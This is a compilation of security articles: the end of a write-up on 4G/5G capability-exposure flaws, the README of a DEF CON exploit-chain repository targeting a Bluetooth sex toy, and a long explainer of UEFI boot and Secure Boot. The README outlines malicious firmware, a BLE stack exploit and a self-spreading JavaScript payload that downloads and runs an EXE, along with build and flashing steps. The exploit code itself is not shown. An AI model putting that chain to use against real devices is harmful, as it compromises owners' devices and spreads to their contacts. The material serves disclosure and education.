their impact and countermeasures is shown in the following Table 1 [4].
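The proposed ordering fix (honour a capability enquiry only after RRC security is active) can be sketched as a simple state check. This is an illustrative model; the class and method names are mine, not 3GPP's.

```python
# Sketch of the countermeasure: an eNodeB state machine that refuses to
# request device capabilities until RRC security has been activated.
class ENodeB:
    def __init__(self):
        self.rrc_security_active = False
        self.device_capabilities = None

    def activate_rrc_security(self):
        # In reality: AS security mode command, integrity + ciphering keys.
        self.rrc_security_active = True

    def request_capabilities(self, device):
        if not self.rrc_security_active:
            # Pre-security, the exchange is plaintext and a MiTM could
            # read or alter it -- so the fixed eNodeB refuses.
            raise RuntimeError("capability enquiry before RRC security")
        self.device_capabilities = device.capabilities()

class Device:
    def capabilities(self):
        return {"volte", "psm", "nb-iot"}

enb, dev = ENodeB(), Device()
try:
    enb.request_capabilities(dev)  # rejected: security not yet active
except RuntimeError as e:
    print(e)
enb.activate_rrc_security()
enb.request_capabilities(dev)      # now allowed, over a protected link
```

The operator-side fix described in the text is exactly this reordering, which is why it can ship as a software or configuration update rather than a hardware change.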
In part 2, we will be publishing our work on improving the 5G and 4G Authentication and Key Agreement (AKA) protocol to mitigate mobile subscriber privacy issues. We also outline AKA protocol related network configuration issues in deployed 4G networks worldwide. References: [1] 5G commercial network world coverage map: 5G field testing / 5G trials / 5G research / 5G development by country (June 15, 2019). https://www.worldtimezone.com/5g.html [2] 3GPP. 2018. 3GPP System Architecture Evolution (SAE); Security architecture. Technical Specification (TS) 33.401. 3rd Generation Partnership Project (3GPP). http://www.3gpp.org/DynaReport/33401.htm [3] 3GPP. 2018. Security architecture and procedures for 5G System. Technical Specification (TS) 33.501. 3rd Generation Partnership Project (3GPP). http://www.3gpp.org/DynaReport/33501.htm [4] Altaf Shaik, Ravishankar Borgaonkar, Shinjo Park, and Jean-Pierre Seifert. 2019. New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities. In Proceedings of the 12th Conference on Security and Privacy in Wireless and Mobile Networks (WiSec ’19). ACM, New York, NY, USA, 221-231. DOI: https://doi.org/10.1145/3317549.3319728 Source: https://infosec.sintef.no/en/informasjonssikkerhet/2019/08/new-vulnerabilities-in-5g-security-architecture-countermeasures/
  9. butthax This repository contains code for an exploit chain targeting the Lovense Hush connected buttplug and associated software. This includes fully functional exploit code for a Nordic Semiconductor BLE stack vulnerability affecting all versions of SoftDevices s110, s120 and s130, as well as versions of the s132 SoftDevice 2.0 and under. Exploit details can be found in the slides for the associated DEF CON 27 talk, Adventures in smart buttplug penetration (testing). How to build I don't really expect anyone to actually build this, but if for some reason you do, follow these steps: Get armips (I used version 0.10.0) and have it in your PATH Install devkitARM Get the buttplug's SoftDevice from Nordic (s132_nrf52_1.0.0-3.alpha_softdevice.hex) and place it in the inputbin directory (or dump it from your own plug) Dump your buttplug's application firmware through SWD (for example with j-link command "savebin hushfw.bin, 1f000, 4B30") and place it as hushfw.bin in the inputbin directory Run build.bat - it should generate exploitfw.zip. You can then use the Nordic Toolbox app to enable DFU mode on the target buttplug using the "DFU;" serial command and then flash the custom firmware you just built through the app's DFU functionality NOTE: if anything goes wrong building this you could totally end up bricking your toy, or worse. So please be sure to 100% know what you're doing and don't blame me if it does mess up. 
Files fwmod: malicious firmware for the Hush firmwaremod.s: edits the firmware to (a) install hooks into the softdevice that will allow us to intercept raw incoming/outgoing BLE packets and (b) send our own raw BLE packets exploit source/main.c: C implementation of the Nordic SoftDevice BLE vulnerability exploit source/payload.c: binary payload to be sent to and run by the victim USB dongle inputbin: input binaries that i don't want to redistribute because i didn't make them and don't want to get in trouble (BYOB) js/t.js: JavaScript payload to run in the Lovense Remote app - downloads an EXE file, runs it, and then forwards the payload to everyone in the user's friend list s132_1003a_mod: modifications to the 1.0.0.3alpha version of the s132 SoftDevice (which is what the Hush ships with) which allow our modded firmware to interact with the BLE stack - must be built before fwmod scripts: various python scripts to help build this crap shellcode: a few assembly files for tiny code snippets used around the exploit chain - doesn't need to be built as they're already embedded in other places, only provided for reference flash.s: source for fwmod/exploit/source/payload.c, i.e. the payload that runs on the victim USB dongle - contains code to generate the HTML/JavaScript payload, flash it to the dongle for persistence, and then send it over to the app Contact You can follow me on twitter @smealum or email me at smealum@gmail.com. Disclaimer don't be a dick, please don't actually try to use any of this Source: https://github.com/smealum/butthax/blob/master/README.md
  10. Understanding modern UEFI-based platform boot To many, the (UEFI-based) boot process is like voodoo; interesting in that it's something that most of us use extensively but is - in a technical-understanding sense - generally avoided by all but those that work in this space. In this article, I hope to present a technical overview of how modern PCs boot using UEFI (Unified Extensible Firmware Interface). I won't be mentioning every detail - honestly my knowledge in this space isn't fully comprehensive (and hence the impetus for this article-as-a-primer). Also, I can be taken to task for being loose with some terminology but the general idea is that by the end of this long read, hopefully both the reader - and myself - will be able to make some sense of it all and have more than just a vague inkling about what on earth is going on in those precious seconds before the OS comes up. This work is based on a combination of info gleaned from my own daily work as a security researcher/engineer at Microsoft, public platform vendor datasheets, UEFI documentation, some fantastic presentations by well-known security researchers + engineers operating in this space, reading source code and black-box research into the firmware on my own machines. Beyond BIOS: Developing with the Unified Extensible Firmware Interface by Vincent Zimmer et al. is a far more comprehensive resource and I'd implore you to stop reading now and go and read that for full edification (I personally paged through to find the bits interesting to me). The only original bit that you'll find below is all the stuff that I get wrong (experts; please feel free to correct me and I'll keep this post alive with errata). The code/data for most of what we're going to be discussing below resides in flash memory (usually SPI NOR). The various components are logically separated into a bunch of sections in flash, UEFI parts are in structures called Firmware Volumes (FVs). 
Going into the exact layout is unnecessary for what we're trying to achieve here (an overview of boot), so I've left it out. SEC SEC Genesis 1 1 In the beginning, the firmware was created. 2 And while it was with form, darkness was indeed upon the face of the deep. And the spirit of the BIOS moved upon the face of the flash memory. 3 And the Power Management Controller said, Let there be light: and there was light. 4 And SEC saw the light, that it was good: and proceeded to boot. Platform Initialization starts at power-on. The first phase in the process is called the SEC (Security) phase. Before we dive in though, let's back up for a moment. Pre-UEFI A number of components of modern computer platform design exist that would be pertinent for us to familiarize ourselves with. Contrary to the belief of some, there are numerous units capable of execution on a modern PC platform (usually presenting with disparate architectures). In days past, there were three main physically separate chips on a classic motherboard - the northbridge (generally responsible for some of the perf-critical work such as the faster comms, memory controller, video), the southbridge (less-perf-critical work such as slower I/O, audio, various buses) and, of course, the CPU itself. On modern platforms, the northbridge has been integrated on to the CPU die (IP blocks of which are termed the 'Uncore' by Intel, 'Core' being the main CPU IP blocks) leaving the southbridge; renamed the PCH (Platform Controller Hub) by Intel - something we're just going to refer to as the 'chipset' here (to cover AMD as well). Honestly, exactly which features are on the CPU die and which on the chipset die is somewhat fluid and is prone to change generationally (in SoC-based chips both are present on the same die; 'chiplet' approaches have separate dies but share the same chip substrate, etc).
Regardless, the pertinent piece of information here is that we have one unit capable of execution - the CPU - that has a set of features, and another unit - the chipset - that has another set of supportive features. The CPU is naturally what we want to get up and running such that we can do some meaningful work, but the chipset plays a role in getting us there - to a smaller or larger extent depending on the platform itself (and Intel + AMD take slightly different approaches here). Let's try to get going again; but this time I'll attempt to lie a little less: after all, SEC is a genesis but not *the* Genesis. That honour - on Intel platforms at least - goes to a component of the chipset (PCH) called the CSME (Converged Security and Manageability Engine). A full review of the CSME is outside the scope of this work (if you're interested, please refer to Yanai Moyal & Shai Hasarfaty's BlackHat USA '19 presentation on the same), but what's relevant to us is its role in the platform boot process. On power-on, the PMC (Power Management Controller) delivers power to the CSME (incidentally, the PMC has a ROM too - software is everywhere nowadays - but we're not going to go down that rabbit hole). The CPU is stuck in reset and no execution is taking place over there. The CSME (which is powered by a tiny i486-like IP block), however, starts executing code from its ROM (which is immutably fused on to the chipset die). This ROM code acts as the Root-of-Trust for the entire platform. Its main purpose is to set up the i486 execution environment, derive platform keys, load the CSME firmware off the SPI flash, verify it (against a fused hash of an Intel public key) and execute it. Skipping a few steps in the initial CSME flow - eventually it gets itself to a state where it can involve itself in the main CPU boot flow (CSME Bringup phase).
Firstly, the CSME implements an iTPM (integrated TPM) that can be used on platforms that don't have discrete TPM chips (Intel calls this PTT - Platform Trust Technology). While the iTPM capabilities are invoked during the boot process (such as when Measured Boot is enabled), this job isn't unique to the CSME and the existence of a dTPM module would render the CSME's job here moot. More important is the CSME's role in the boot process itself. The level of CSME involvement in the initial stages of host CPU execution depends on what security features are enabled on the platform. In the most straightforward case (no Verified or Measured Boot - modes of Intel's Boot Guard), the CSME simply asks the PMC to bring the host CPU out of reset and boot continues with IBB (Initial Boot Block) execution as will be expounded on further below. When Boot Guard's Verified Boot mode is enabled, however, a number of steps take place to ensure that the TCB (Trusted Computing Base) can be extended to the UEFI firmware; a fancy way of saying that one component will only agree to execute the next one in the chain after cryptographic verification of that component has taken place (in the case of Verified Boot's enforcement mode; if we're just speaking of Measured Boot, the verification takes place and TPM PCRs are extended accordingly, but the platform is allowed to continue to boot).
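The "extend" operation that Measured Boot relies on is worth sketching: a PCR can only ever be extended (pcr = H(pcr || H(measurement))), never set directly, so the final value commits to the whole ordered boot sequence. The hash chaining below is the standard TPM 2.0 construction; the component names are illustrative.

```python
# Sketch of TPM-style measurement into a PCR. A PCR starts zeroed at
# reset and can only be extended, so its final value depends on every
# measurement and on their order.
import hashlib

def extend(pcr: bytes, measurement: bytes) -> bytes:
    return hashlib.sha256(pcr + hashlib.sha256(measurement).digest()).digest()

pcr0 = b"\x00" * 32  # PCRs start zeroed at reset
for component in [b"SEC+PEI", b"DXE", b"boot manager"]:
    pcr0 = extend(pcr0, component)

# Swapping in a tampered component yields a different final PCR value,
# which a remote verifier can detect via attestation.
tampered = b"\x00" * 32
for component in [b"SEC+PEI", b"evil DXE", b"boot manager"]:
    tampered = extend(tampered, component)

print(pcr0 != tampered)  # True
```

This is also why the platform is "allowed to continue to boot" under Measured Boot alone: nothing blocks execution, but the tampering is cryptographically recorded for later attestation.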
Let's define some terms (Clark-Wilson integrity policy) because throwing academic terms into anything makes us look smart: CDI (Constrained Data Item) - trusted data UDI (Unconstrained Data Item) - untrusted data TP (Transformation Procedure) - the procedure that will be applied to UDI to turn it into CDI; such as by certifying it with an IVP (Integrity Verification Procedure) In other words, We take a block of untrusted data (UDI) which can be code/data/config/whatever, run it through a procedure (TP) in the trusted code (CDI) such that it turns that untrusted data to trusted data; the obvious method of transformation being cryptographic verification. In other other words, trusted code verifies untrusted code and therefore that untrusted code now becomes trusted. With that in mind, the basic flow is as follows: The CSME starts execution from the reset vector of its ROM code. The ROM is assumed to be CDI from the start and hence is the Root-of-Trust The initial parts of the CSME firmware are loaded off the flash into SRAM (UDI), verified by the ROM (now becoming CDI) and executed The CPU uCode (microcode) will be loaded. This uCode is considered UDI but is verified by the CPU ROM which acts as the Root-of-Trust for the CPU Boot Guard is enabled, so the uCode will load a component called the ACM (Authenticated Code Module) (UDI) off the flash, and will, using the CPU signing key (fused into the CPU), verify it The ACM (now CDI) will request the hash of the OEM IBB signing key from the CSME. The CSME is required here as it has access to the FPF (Field Programmable Fuses) which are burned by the OEM at manufacturing time The ACM will load the IBB (UDI) and verify it using the OEM key (now CDI). The CPU knows if Boot Guard is enabled by querying the CSME FPFs for the Boot Guard policy. Astute readers will notice that there is a type of 'dual root-of-trust' going on here; rooted in both the CSME and the CPU. 
(Note: I've purposefully left out details of how the ACM is discovered on the flash; Firmware Interface Table, etc. as it adds further unnecessary complexity for now. I'll consider fleshing this out in the future.) The CPU now continues to boot by executing the IBB; either unverified (in no Boot Guard scenario) or verified. We are back at the other Genesis. Hold up for a moment (making forward progress is tough, isn't it??)! Let's speak about Measured Boot here for a short moment. In it's simplest configuration, this feature basically means that at every step, each component will be measured into the TPM (such that it can be attested to in the future). When Measured Boot is enabled, an interesting possible point to note here: A compromise of the CSME - in its Bringup phase - leads to a compromise of the entire TCB because an attacker controls the IBB signing keys provided to the CPU ACM. A machine that has a dTPM and doesn't rely on the CSME-implemented iTPM for measurement, could still potentially detect this compromise via attestation. Not so when the iTPM is used (as the attacker controlling CSME potentially controls the iTPM as well). Boot Guard (Measured + Verified Boot), IBB, OBB are Intel terms. In respect of AMD, their HVB (Hardware Validated Boot) covers the boot flow in a similar fashion to Intel's Boot Guard. The main difference seems to be that the Root-of-Trust is rooted in the Platform Security Processor (PSP) which fills both the role of Intel's CSME and the ACM. The processor itself is ARM-Cortex-based and sits on the CPU die itself (and not in the PCH as in Intel's case). The PSP firmware is still delivered on the flash; it has it's own BL - bootloader which is verified from the PSP on-die ROM, analogous to CSME's Bringup stage. The PSP will then verify the initial UEFI code before releasing the host CPU from reset. AMD also don't speak about IBB/OBB, rather they talk about 'segments', each responsible for verifying the next segment. 
SEC Ok, ok we're at Genesis for real now! But wait (again)! What's this IBB (Initial Boot Block) thing? Wasn't the SEC phase the start of it all (sans the actual start of it all, as above). All these terms aren't confusing enough. At all. I purposely didn't open at the top with a 'top down' view the boot verification flow - instead opting to explain organically as we move forward. We have, however, discussed the initial stage of Verified Boot. We now understand how trust is established in this IBB block (or first segment). We can quickly recap the general Verified Boot flow: In short, as we have already established, the ACM (which is Intel's code), verifies the IBB (OEM code). The IBB as CDI will be responsible for verifying the OBB (OEM Boot Block) UDI to transform it into a CDI. The OBB then verifies the next code to run (which is usually the boot manager or other optional 3rd part EFI images) - as part of UEFI Secure Boot. So in terms of verification (with the help of CSME): uCode->ACM->IBB->OBB->whatevers-next Generally, the IBB encapsulates the SEC + Pre-EFI Initialization (PEI) phases - the PEI FV (Firmware Volume). (The SEC phase named as such but having relatively little to do with actual 'security'.) With no Verified Boot the CPU will start executing the SEC phase from the legacy reset vector (0xfffffff0); directly off the SPI flash (the hardware has the necessary IP to implement a transparent memory-mapped SPI interface to the flash. At the reset vector, the platform can execute only in a constrained state. For example, it has no concept of crucial components such as RAM. Kind of an issue if we want to execute meaningful higher-level code. It is also in Real Mode. As such, one of the first jobs of SEC is switch the processor to Protected Mode (because legacy modes aren't the funnest). It will also configure the memory available in the CPU caches into a CAR (Cache-as-RAM) 'no-eviction mode' - via MTRRs. 
This mode will ensure that reads/writes to the CPU caches do not result in an attempt to evict them to primary memory external to the chip. The constraint created here is that the available memory is limited to that available in the CPU caches, but this is usually quite large nowadays; the recent Ryzen 3900X chip that I acquired has a total of 70 MB; more than sufficient for holding the entire firmware image in memory + extra for execution environment usage (data regions, heaps + stacks); not that this is actually done. Another important function of SEC is to perform the initial handling of the various sleep states that the machine could have resumed from and direct to alternate boot paths accordingly. This is absolutely out of scope for our discussion (super complex) - as is anything to do with ACPI; it's enough to know that it happens (and has a measurable impact on platform security + attack surface). And because we want to justify the 'SEC' phase naming, uCode updates can be applied here. When executing the SEC from a Verified Boot flow (i.e. after ACM verification of the IBB), it seems to me that the CPU caches must already have been set up as CAR (perhaps by the ACM?); in an ideal world the entire IBB should already be cache-memory resident (if it was read directly off the flash after passing verification, we'd potentially have a physical-attack TOCTOU security issue on our hands). I'd hope that the same is true on the AMD side. After SEC is complete, platform initialization continues with the Pre-EFI Initialization phase (PEI). Each phase requires a hand-off to the next phase which includes a set of structured information necessary for the subsequent phase to do its job. In the case of the SEC, this information includes necessary vectors detailing where the CAR is located, where the BFV (Boot Firmware Volume) can be found mapped into a processor-accessible memory region, and some other bits and bobs.
PEI PEI is comprised of the PEI Foundation - a binary that has no code dependencies - and a set of Pre-EFI Initialization Modules (PEIMs). The PEI Foundation (PeiCore) is responsible for making sure PEIMs can communicate with each other (via the PPI - PEIM-to-PEIM Interface) and for a small runtime environment providing a number of further services (exposed via the PEI Services Table) to those PEIMs. It also dispatches (invokes/executes) the PEIMs themselves. The PEIMs are responsible for all aspects of base-hardware initialization, such as primary memory configuration (such that main RAM becomes available), CPU + IO initialization, system bus + platform setup and the init of various other features core to the functioning of a modern computing platform (such as the all-important BIOS status code). Some of the code running here is decidedly non-trivial (for example, I've seen a USB stack) and I've observed that there are more PEIMs than one would reasonably think there should be; on my MSI X570 platform I count ~110 modules! I'd like to briefly call out the PEIM responsible for main memory discovery and initialization. When it returns to the PEI Foundation, it provides information about the newly-available primary system memory. The PEI Foundation must now switch from the 'temporary' CAR memory to the main system memory. This must be done with care (from a security perspective). PEIMs can also choose to populate sequential data structures called HOBs (Hand-Off Blocks) which include information that may be necessary to consuming code further down the boot stack (e.g. in phases post-PEI). These HOBs must be resident in main system memory. Before we progress to the next phase, I'd like to return to our topic of trust. Theoretically, the PEI Foundation is expected to dispatch a verification check before executing any PEIM. The framework itself has no notion of how to establish trust, so it should delegate this to a set of PPIs (potentially serviced by other PEIMs).
There is a chicken-and-egg issue here: if some component of the PEI phase is responsible for establishing trust, what establishes trust in that component? This is all meaningless unless the PEI itself (or a subsection of it) is trusted. As a reminder, though, we know that the IBB - which encapsulates SEC+PEI (hopefully, unless the OEM has messed this up) - is verified and trusted (CDI) when running under Verified Boot, so the PEI doesn't necessarily need to perform its own integrity checks on the various PEIMs; or does it? Here you can see the haze that becomes a source of confusion for OEMs implementing security around this - with all the good will in the world.

If the IBB is memory resident, has been verified by the ACM and is untouched since verification, a shortcut can be taken and having the PEI verify PEIMs seems superfluous. If, however, PEIMs are loaded from flash as and when they're needed, they need to be verified before execution, and that verification needs to be rooted in the TCB already established by the ACM (i.e. the initial code that it verified as the IBB). If PEI code is XIP (eXecuted In Place), things are even worse and physical TOCTOU attacks become a sad reality.

Without a TCB established via a verified boot mechanism, the PEI is self-trusted and becomes the Root-of-Trust. This is referred to as the CRTM - the Core Root of Trust for Measurement (the importance of which will become apparent when we eventually speak about Secure Boot). The PEI is measured into the TPM in PCR0 and can be attested to later on, but without a previously-established TCB, any old Joe can just replace the thing; remotely, if the OEM has messed up the secure firmware update procedure or left the SPI flash writable. Oy.

Our flow is now almost ready to exit the PEI phase with the platform set up and have some 'full-fledged' code! Next up is the DXE (Driver eXecution Environment) phase. Before entering DXE, PEI must perform two important tasks.
The first is to verify the DXE. In our Intel parlance, PEI (or at least the part of it responsible for trust) was part of the IBB that was verified by the Boot Guard ACM. Intel's Boot Guard / AMD's HVB code has already exited the picture once the IBB (Intel) / 1st segment (AMD) starts executing, and the OEM is expected to take over the security flow from here (eh). PEI must therefore have some component to verify and measure the OBB/next phase (of which DXE is a part). On platforms that support Boot Guard, a PEIM (it may be named BootGuardPei in your firmware) is responsible for doing this work. This PEIM registers a callback procedure to be called when the PEI phase is ready to exit. When it is called, it is expected to bring the OBB resident and verify it. The same discussion applies to the DXE as did to the PEI above regarding verification of the various DXE modules (we'll discuss what these are shortly). If the entire OBB is brought resident and verified by this PEIM, the OEM may decide to shortcut verification of each DXE module. Alternatively, a part of DXE can be made CDI and used to verify each module prior to execution (bringing with it all the security considerations already mentioned). Either way: yet another part of the flow where the OEM can mess things up.

The second, and final, task of the PEI is to set up and execute the DXE environment. Anyhoo, let's get right to DXE.

DXE

Similar to PEI, DXE consists of a DXE Foundation - the DXE Core + DXE driver dispatcher (DxeCore) - and a number of DXE drivers. We could go down an entire rabbit hole around what's available to, and exposed by, the DXE phase; yet another huge collection of code (this time I count ~240 modules in my firmware). But as we're not writing a book, I'll leave it up to whoever's interested to delve further as homework. The DXE Foundation has access to the various PEIM-populated HOBs.
These HOBs include all the information necessary to have the entire DXE phase function independently of what has come before it. Therefore, nothing (other than the HOB list) has to persist once DXE Core is up and running, and DXE can happily blast over whatever is left of PEI in memory.

The DXE Dispatcher will discover and execute the DXE drivers available in the relevant firmware volume. These drivers are responsible for higher-level platform initialization and services. Some examples include the setting up of System Management Mode (SMM) and higher-level firmware drivers such as network, boot disks, thermal management, etc. Similar to what the PEI Framework does for PEIMs, the DXE Framework exposes a number of services to DXE drivers (via the DXE Services Table). These drivers are able to register (and look up + consume) various architectural protocols covering higher-level constructs such as storage, security, RTC, etc.

DXE Core is also responsible for populating the EFI System Table, which includes pointers to the EFI Boot Services Table, EFI Runtime Services Table and EFI Configuration Table. The EFI Configuration Table contains a set of GUID/pointer pairs that correspond to various vendor tables identified by their GUIDs. It's not really necessary to delve into these for the purposes of our discussion:

typedef struct {
  ///
  /// The 128-bit GUID value that uniquely identifies the system configuration table.
  ///
  EFI_GUID    VendorGuid;
  ///
  /// A pointer to the table associated with VendorGuid.
  ///
  VOID        *VendorTable;
} EFI_CONFIGURATION_TABLE;

The EFI Runtime Services Table contains a number of services that are invokable for the duration of system runtime:

typedef struct {
  ///
  /// The table header for the EFI Runtime Services Table.
  ///
  EFI_TABLE_HEADER                Hdr;

  //
  // Time Services
  //
  EFI_GET_TIME                    GetTime;
  EFI_SET_TIME                    SetTime;
  EFI_GET_WAKEUP_TIME             GetWakeupTime;
  EFI_SET_WAKEUP_TIME             SetWakeupTime;

  //
  // Virtual Memory Services
  //
  EFI_SET_VIRTUAL_ADDRESS_MAP     SetVirtualAddressMap;
  EFI_CONVERT_POINTER             ConvertPointer;

  //
  // Variable Services
  //
  EFI_GET_VARIABLE                GetVariable;
  EFI_GET_NEXT_VARIABLE_NAME      GetNextVariableName;
  EFI_SET_VARIABLE                SetVariable;

  //
  // Miscellaneous Services
  //
  EFI_GET_NEXT_HIGH_MONO_COUNT    GetNextHighMonotonicCount;
  EFI_RESET_SYSTEM                ResetSystem;

  //
  // UEFI 2.0 Capsule Services
  //
  EFI_UPDATE_CAPSULE              UpdateCapsule;
  EFI_QUERY_CAPSULE_CAPABILITIES  QueryCapsuleCapabilities;

  //
  // Miscellaneous UEFI 2.0 Service
  //
  EFI_QUERY_VARIABLE_INFO         QueryVariableInfo;
} EFI_RUNTIME_SERVICES;

These runtime services are utilized by the OS to perform UEFI-level tasks. The functionality provided by the vectors in the table above is mostly self-explanatory; e.g. the variable services are used to read/write EFI variables - usually stored in NV (non-volatile) memory, i.e. on the flash. (The Windows Boot Configuration Data (BCD) makes use of this interface for storing variable boot-time settings, for example.)

The EFI Boot Services Table contains a number of services that are invokable by EFI applications until such time as ExitBootServices() - itself an entry in this table - is called:

typedef struct {
  ///
  /// The table header for the EFI Boot Services Table.
  ///
  EFI_TABLE_HEADER                             Hdr;

  //
  // Task Priority Services
  //
  EFI_RAISE_TPL                                RaiseTPL;
  EFI_RESTORE_TPL                              RestoreTPL;

  //
  // Memory Services
  //
  EFI_ALLOCATE_PAGES                           AllocatePages;
  EFI_FREE_PAGES                               FreePages;
  EFI_GET_MEMORY_MAP                           GetMemoryMap;
  EFI_ALLOCATE_POOL                            AllocatePool;
  EFI_FREE_POOL                                FreePool;

  //
  // Event & Timer Services
  //
  EFI_CREATE_EVENT                             CreateEvent;
  EFI_SET_TIMER                                SetTimer;
  EFI_WAIT_FOR_EVENT                           WaitForEvent;
  EFI_SIGNAL_EVENT                             SignalEvent;
  EFI_CLOSE_EVENT                              CloseEvent;
  EFI_CHECK_EVENT                              CheckEvent;

  //
  // Protocol Handler Services
  //
  EFI_INSTALL_PROTOCOL_INTERFACE               InstallProtocolInterface;
  EFI_REINSTALL_PROTOCOL_INTERFACE             ReinstallProtocolInterface;
  EFI_UNINSTALL_PROTOCOL_INTERFACE             UninstallProtocolInterface;
  EFI_HANDLE_PROTOCOL                          HandleProtocol;
  VOID                                         *Reserved;
  EFI_REGISTER_PROTOCOL_NOTIFY                 RegisterProtocolNotify;
  EFI_LOCATE_HANDLE                            LocateHandle;
  EFI_LOCATE_DEVICE_PATH                       LocateDevicePath;
  EFI_INSTALL_CONFIGURATION_TABLE              InstallConfigurationTable;

  //
  // Image Services
  //
  EFI_IMAGE_LOAD                               LoadImage;
  EFI_IMAGE_START                              StartImage;
  EFI_EXIT                                     Exit;
  EFI_IMAGE_UNLOAD                             UnloadImage;
  EFI_EXIT_BOOT_SERVICES                       ExitBootServices;

  //
  // Miscellaneous Services
  //
  EFI_GET_NEXT_MONOTONIC_COUNT                 GetNextMonotonicCount;
  EFI_STALL                                    Stall;
  EFI_SET_WATCHDOG_TIMER                       SetWatchdogTimer;

  //
  // DriverSupport Services
  //
  EFI_CONNECT_CONTROLLER                       ConnectController;
  EFI_DISCONNECT_CONTROLLER                    DisconnectController;

  //
  // Open and Close Protocol Services
  //
  EFI_OPEN_PROTOCOL                            OpenProtocol;
  EFI_CLOSE_PROTOCOL                           CloseProtocol;
  EFI_OPEN_PROTOCOL_INFORMATION                OpenProtocolInformation;

  //
  // Library Services
  //
  EFI_PROTOCOLS_PER_HANDLE                     ProtocolsPerHandle;
  EFI_LOCATE_HANDLE_BUFFER                     LocateHandleBuffer;
  EFI_LOCATE_PROTOCOL                          LocateProtocol;
  EFI_INSTALL_MULTIPLE_PROTOCOL_INTERFACES     InstallMultipleProtocolInterfaces;
  EFI_UNINSTALL_MULTIPLE_PROTOCOL_INTERFACES   UninstallMultipleProtocolInterfaces;

  //
  // 32-bit CRC Services
  //
  EFI_CALCULATE_CRC32                          CalculateCrc32;

  //
  // Miscellaneous Services
  //
  EFI_COPY_MEM                                 CopyMem;
  EFI_SET_MEM                                  SetMem;
  EFI_CREATE_EVENT_EX                          CreateEventEx;
} EFI_BOOT_SERVICES;

These services are crucial for getting any OS boot loader up and running.

Trying to stick to the format of explaining the boot process via the security flow, we now need to speak about Secure Boot. As 'Secure Boot' is often bandied about as the be-all and end-all of boot-time security, if you take anything away from reading this, please let it be an understanding that Secure Boot is not all that is necessary for trusted platform execution. It plays a crucial role, but should not be seen as a technology that can be considered robust in a security sense without other addendum technologies (such as Measured + Verified Boot).

Simply put, Secure Boot is this: prior to execution of any EFI application, if Secure Boot is enabled, the relevant Secure Boot-implementing DXE driver (SecureBootDXE on my machine) must verify the executable image before launching that application. This requires a number of cryptographic keys:

PK - Platform Key: the platform 'owner' (alas, usually the OEM) issues a key which is written into a secure EFI variable (these variables are only updatable if the update is attempted by an entity that can prove its ownership over the variable; we won't discuss how this works here - just know: the security around this can be meh). This key must only be used to verify the KEK.

KEK - Key Exchange Key: one or more keys that are signed by the PK - used to update the current signature databases.

dbx - Forbidden Signature Database: database of entries (keys, signatures or hashes) that identify EFI executables that are blacklisted (i.e. forbidden from executing). The database is signed by the KEK.

db - Signature Database: database of entries (keys, signatures or hashes) that identify EFI executables that are whitelisted.
The database is signed by the KEK.

[Secure firmware update key: outside the scope of this discussion.]

For example, prior to executing any OEM-provided EFI applications or the Windows Boot Manager, the DXE code responsible for Secure Boot must first check that the EFI image either appears verbatim in the db or is signed with a key present in the db. Commercial machines often come with an OEM-provisioned PK and Microsoft's KEK and CA already present in the db (much debate over how fair this is).

Important note: Secure Boot is not designed to defend against an attacker with physical access to a machine (keys are, by design, replaceable).

BDS

The DXE phase doesn't perform a formal hand-off to the next phase in the UEFI boot process, the BDS (Boot Device Selection) phase; rather, DXE is still resident and provides both EFI Boot and EFI Runtime services to the BDS (via the tables described above). What happens from here can differ slightly depending on what it is that we're booting (if running some simple EFI application is our end goal, we are basically done already), so let's carry on our discussion in terms of Microsoft Windows.

As mentioned, when all the necessary DXE drivers have been executed and the system is ready to boot an operating system, the DXE code will attempt to launch a boot application. Boot menu entries are specified in EFI variables, and EFI boot binaries are usually resident on the relevant EFI system partition. In order to discover + use the system partition, DXE must already (a) have a FAT driver loaded such that it can make sense of the file system (which is FAT-based) and (b) parse the GUID Partition Table (GPT) to discover where the system partition is on disk.

The first Windows-related code to run (ignoring any Microsoft-provided PEIMs or DXE drivers) is the Windows Boot Manager (bootmgfw.efi). The Windows Boot Manager is the initial boot loader required to get Windows running.
It uses the EFI Boot Services-provided block IO protocol to transact with the disk (so that it doesn't need to mess around with working out how to communicate with the hardware itself). Mainly, it's responsible for selecting the configured Windows boot loader and invoking it (but it does some other stuff too, like setting up security policies and checking whether resuming from hibernation or a recovery boot is needed).

TSL

Directly after BDS is done, we've got the TSL (Transient System Load) phase; a fancy way of describing the phase where the boot loader actually brings up the operating system and tears down the unnecessary parts of DXE. In the Windows world, the Windows Boot Manager will now launch the Windows Boot Loader (winload.efi) - after performing the necessary verification (if Secure Boot is enabled).

The Windows Boot Loader is a heftier beast and performs some interesting work. In the simplest - not-caring-about-anything-security-related - flow, winload.efi is responsible for initializing the execution environment such that the kernel can execute. This includes enabling paging and setting up the kernel's page tables, dispatch tables, stacks, etc. It also loads the SYSTEM registry hive (read-only, I believe) and the kernel module itself - ntoskrnl.exe (and once-upon-a-time hal.dll as well). Just before passing control to the NT kernel, winload will call ExitBootServices() to tear down the boot-time services still exposed from DXE (leaving just the runtime services available) and SetVirtualAddressMap() to virtualize the firmware services (i.e. informing the DXE runtime service handler of the relevant virtual address mappings).

Carrying on with our theme of attempting to understand how trusted computing is enabled (now with Windows as the focus): on a machine with Secure Boot enabled, winload will of course only agree to load images after first ensuring they pass verification policy (and measuring the respective images into the TPM, as necessary).
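The Secure Boot image-verification policy described above boils down to a simple rule: a dbx (forbidden) hit always vetoes a db (allowed) hit. The following is a hypothetical model of that policy only - real verification compares Authenticode digests and certificate chains per the UEFI spec, not the raw digest compare used here, and all names are mine:

```c
#include <string.h>
#include <stddef.h>

#define HASH_LEN 32  /* e.g. a SHA-256 image digest */

/* A signature database modeled as a flat array of image digests. */
struct sig_db {
    const unsigned char (*entries)[HASH_LEN];
    size_t count;
};

static int db_contains(const struct sig_db *db,
                       const unsigned char digest[HASH_LEN])
{
    for (size_t i = 0; i < db->count; i++)
        if (memcmp(db->entries[i], digest, HASH_LEN) == 0)
            return 1;
    return 0;
}

/* Policy sketch: the forbidden database (dbx) is consulted first and
 * always wins; otherwise the image must appear in db to run. */
static int may_execute(const struct sig_db *db, const struct sig_db *dbx,
                       const unsigned char digest[HASH_LEN])
{
    if (db_contains(dbx, digest))
        return 0;                   /* blacklisted: never run */
    return db_contains(db, digest); /* must be whitelisted    */
}
```

The dbx-first ordering is the whole point of having a revocation database: it lets a previously-whitelisted (or still-signed) binary be blocked after the fact.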
